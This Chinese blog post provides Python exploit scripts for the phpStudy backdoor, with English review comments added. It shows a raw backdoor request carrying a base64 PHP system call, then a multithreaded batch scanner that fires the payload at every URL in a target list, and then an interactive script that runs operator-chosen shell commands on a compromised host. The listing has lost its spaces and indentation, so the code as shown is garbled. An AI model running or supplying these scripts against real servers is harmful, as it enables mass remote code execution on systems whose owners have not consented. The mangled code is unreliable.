phpstudy后门rce批量利用脚本的实现
本文写两个脚本:一个用于批量检测,一个是交互式shell。
Python的Qt图形化版本暂时写出来了,但还有点问题。
后门包(accept-charset头的值是Base64编码的PHP代码,也就是后门会执行的内容;排查时可在Web日志或流量中检索该请求头里的Base64字符串):
GET/HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:55.0)Gecko/20100101Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection:close
accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding:gzip,deflate
Upgrade-Insecure-Requests:1
执行那段写shell即可
晚上抽点空简单写个发包的py:
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importqueue
# Startup banner only; these prints do not influence the request that follows.
print("======PhpstudyBackdoorExploit============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
# Marker payload: a PHP snippet that only echoes a fixed string. It is
# base64-encoded and converted back to str so it can be used as a header value.
payload="echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
# Request headers. Everything except 'accept-charset' is browser-like filler;
# 'accept-charset' carries the base64 payload built above.
# NOTE(review): for detection, a base64-looking value in this header is the
# distinguishing feature of these requests in web/proxy logs -- confirm against
# captured traffic.
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
# Check one host: send a GET to <url>/index.php with the supplied headers and
# report whether the marker string "qing" appears in the response body.
#   url     -- base URL of the host to check
#   headers -- header dict; the caller puts the base64 payload in 'accept-charset'
# Despite the name, the visible body writes nothing to the remote host; the only
# file it touches is the local success.txt.
# NOTE(review): indentation was lost in this listing; the if/else is presumably
# nested inside the try.
defwrite_shell(url,headers):
try:
# verify=False turns off TLS certificate verification; timeout is 30 seconds.
r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30)
# A plain substring test: a page that contains "qing" for any other reason is
# also reported as a hit, so results need manual confirmation.
if"qing"inr.text:
print('[+]BackDoorsuccessful:'+url+'===============[+]\n')
# Append the URL to a local results file.
withopen('success.txt','a')asf:
f.write(url+'\n')
else:
print('[-]BackDoorfailed:'+url+'[-]\n')
# Bare except: every exception (connection refused, malformed URL, TLS error,
# ...) is printed as "Timeout", so the message does not identify the real cause.
except:
print('[-]Timeout:'+url+'[-]\n')
# Placeholder target from the article ("http://xxx" is not a real host), followed
# by a single check using the module-level headers.
url="http://xxx"
write_shell(url=url,headers=headers)
界面优化、改下多线程、批量读取文本文件后的代码:
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importthreadpool
# Startup banner only; no effect on the checks performed below.
print("======PhpstudyBackdoorExploit============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
# Check one host: build the marker payload and headers, send a GET to
# <url>/index.php, and report whether the marker "qing" appears in the response.
#   url -- base URL of the host to check
# Despite the name, the visible body writes nothing to the remote host; the only
# file it touches is the local success.txt.
# NOTE(review): indentation was lost in this listing; everything down to the
# final print is presumably the function body.
defwrite_shell(url):
# Marker payload: PHP that only echoes a fixed string, base64-encoded and
# converted back to str for use as a header value.
payload="echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
# Browser-like headers; 'accept-charset' carries the base64 payload.
# NOTE(review): a base64-looking value in this header is what distinguishes
# these requests in web/proxy logs -- confirm against captured traffic.
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
try:
# verify=False turns off TLS certificate verification; timeout is 30 seconds.
r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30)
# Plain substring test: a page containing "qing" for any other reason is also
# reported as a hit, so results need manual confirmation.
if"qing"inr.text:
print('[+]BackDoorsuccessful:'+url+'===============[+]\n')
# Append the URL to a local results file. main() calls this function from a
# thread pool and no lock is taken here.
withopen('success.txt','a')asf:
f.write(url+'\n')
else:
print('[-]BackDoorfailed:'+url+'[-]\n')
# Bare except: every exception is printed as "Timeout", whatever its cause.
except:
print('[-]Timeout:'+url+'[-]\n')
#url="http://xxx"
#write_shell(url=url,headers=headers)
# Batch driver: read target URLs from url.txt (one per line) and run
# write_shell on each through a 5-worker pool from the third-party
# `threadpool` package, then block until every queued request has finished.
defmain():
withopen('url.txt','r')asf:
# splitlines() keeps empty lines as '' entries; those are passed to
# write_shell like any other line.
lines=f.read().splitlines()
task_pool=threadpool.ThreadPool(5)
# NOTE(review): this name shadows the imported `requests` module; presumably
# only inside main(), so write_shell still sees the module -- confirm once
# the indentation is known.
requests=threadpool.makeRequests(write_shell,lines)
forreqinrequests:
task_pool.putRequest(req)
task_pool.wait()
# Run the batch driver only when the file is executed as a script.
if__name__=='__main__':
main()
#线程队列部分
#th=[]
#th_num=10
#forxinrange(th_num):
#t=threading.Thread(target=write_shell)
#th.append(t)
#forxinrange(th_num):
#th[x].start()
#forxinrange(th_num):
#th[x].join()
你也可以加上读取php文件的字典这个简单没啥说的
下一个是交互式shell
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importthreadpool
importre
# Startup banner only; no effect on the request sent below.
print("======PhpstudyBackdoorExploit---os-shell============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
# Send one GET to <url>/phpinfo.php with the supplied headers and print whatever
# the response contains between two "qing" markers.
#   url     -- base URL of the host
#   headers -- header dict; the caller has already placed the payload in it
#   payload -- accepted but not used by the visible body
# NOTE(review): indentation was lost in this listing; the lines between try and
# except are presumably the try body.
defos_shell(url,headers,payload):
try:
# verify=False turns off TLS certificate verification; timeout is 10 seconds.
r=requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
#print(r.text)
# Non-greedy capture between the markers; re.S lets '.' span newlines so
# multi-line output is captured.
res=re.findall("qing(.*?)qing",r.text,re.S)
print("[+]===========TheResponse:==========[+]\n")
# All matches are concatenated; with no match this prints an empty string
# under the "Response" banner.
res="".join(res)
print(res)
# Bare except: every exception is reported as a timeout, whatever its cause.
except:
print("[-]===========Failed!Timeout...==========[-]\n")
# Interactive entry point: prompt for a URL and a PHP snippet, wrap the snippet
# in "qing" echo markers, base64-encode it into the 'accept-charset' header, and
# hand everything to os_shell. One request is sent per run; there is no loop.
# NOTE(review): indentation was lost in this listing, so which statements sit
# inside the `if` below cannot be read off the page.
defmain():
url=input("inputtheUrl,example:\"http://127.0.0.1/\"\n")
payload=input("inputthepayload,default:echosystem(\"whoami\");\n")
# Fallback used when the operator enters nothing.
de_payload="echo\"qing\";system(\"whoami\");echo\"qing\";"
ifpayload.strip()=='':
payload=de_payload
# Markers on both sides let os_shell cut the output out of the response body.
payload="echo\"qing\";"+payload+"echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
# Browser-like headers; 'accept-charset' carries the base64 payload.
# NOTE(review): on the server side these requests show up as hits on
# /phpinfo.php with a base64-looking accept-charset value -- confirm against
# captured traffic.
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
os_shell(url=url,headers=headers,payload=payload)
# Run the interactive entry point only when the file is executed as a script.
if__name__=='__main__':
main()